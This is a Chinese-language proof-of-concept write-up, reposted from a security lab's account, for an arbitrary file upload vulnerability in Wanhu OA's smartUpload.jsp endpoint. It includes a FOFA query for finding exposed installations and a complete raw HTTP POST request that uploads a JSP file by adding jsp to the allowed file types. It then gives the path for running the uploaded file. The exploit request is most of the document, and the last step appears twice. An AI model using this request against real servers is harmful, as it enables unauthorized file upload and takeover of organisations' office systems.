万户OA smartUpload.jsp 任意文件上传漏洞

本文转载于公众号：融云攻防实验室，原文地址：

万户OA smartUpload.jsp 任意文件上传漏洞

0x01 阅读须知

0x02 漏洞描述

万户软件网络是业内普遍认可的智慧政务办公专家,oa系统国家行业标准编制组长单位,协同软件国家行业标准编制组长单位,22年专注协同管理领域.为您提供定制化的智慧政务一体化办公解决方案。万户OAsmartUpload.jsp文件存在任意文件上传漏洞，攻击者通过漏洞可以上传任意文件至服务器，导致服务器失陷。

0x03 漏洞复现

fofa：app=”万户网络-ezOFFICE”

1.执行POC写入文件，返回上传文件和改名文件

POST /defaultroot/extension/smartUpload.jsp?path=information&mode=add&fileName=infoPicName&saveName=infoPicSaveName&tableName=infoPicTable&fileMaxSize=0&fileMaxNum=0&fileType=gif,jpg,bmp,jsp,png&fileMinWidth=0&fileMinHeight=0&fileMaxWidth=0&fileMaxHeight=0 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Length: 433
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7,zh-TW;q=0.6
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarynNQ8hoU56tfSwBVU
Cookie: JSESSIONID=PjXnh6bLTzy0ygQf41vWctGPLGkSvkJ6J1yS3ppzJmCvVFQZgm1r!1156443419
Upgrade-Insecure-Requests: 1

------WebKitFormBoundarynNQ8hoU56tfSwBVU
Content-Disposition: form-data; name="photo"; filename="0xold6.jsp"
Content-Type: application/octet-stream

<% out.println("0xold6");%>
------WebKitFormBoundarynNQ8hoU56tfSwBVU
Content-Disposition: form-data; name="continueUpload"

1
------WebKitFormBoundarynNQ8hoU56tfSwBVU
Content-Disposition: form-data; name="submit"

上传继续
------WebKitFormBoundarynNQ8hoU56tfSwBVU--

2.访问该上传默认路径{{hostname}}/defaultroot/upload/information/{{改名文件}}.jsp，得到上传内容

2.访问该上传默认路径{{hostname}}/defaultroot/upload/information/{{改名文件}}.jsp，得到上传内容